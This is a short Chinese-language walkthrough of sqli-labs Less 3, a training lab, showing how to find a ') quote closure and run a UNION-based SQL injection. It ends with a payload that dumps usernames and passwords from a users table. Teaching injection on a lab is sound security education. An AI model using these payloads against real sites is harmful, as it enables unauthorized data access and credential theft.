sqli-labs靶场 less 3
文章目录
- sqli-labs靶场
- less 3 联合注入
sqli-labs靶场
每道题都从以下模板讲解,并且每个步骤都有图片,清晰明了,便于复盘。
sql注入的基本步骤
- 注入点
- 注入类型
- 字符型:判断闭合方式 (‘、"、’'、“”)
- 数字型
- 根据实际情况,选择合适的注入方式
- 获取数据库名,表名,列名,数据
less 3 联合注入
- 题目类型: 字符型 ’ ) 闭合
id=1/0
如果是数字型,则报错,但是回显正常。说明是字符型
id=1" 回显正常,说明肯定不是双引号闭合
id=1’ id=1’ ’ id=1’ ’ ’ id=1’ ’ ’ ’ 呈规律性变化,说明是单引号闭合
id=1’–+
单引号加注释,有报错,说明不是简单的单引号闭合
id=1’1
查看报错信息,可以看到箭头指向的单引号是成对存在的,所以 ’ ) 是多余的,因此闭合方式是单引号加括号
id=1’) order by 4–+
id=1’) order by 3–+
这道题原理与less 1 一样,只不过是闭合方式是 ’ )
id=-1 ’ ) union select 1,2,group_concat(id,“-”,username,“-”,password) from users --+
直接猜解数据
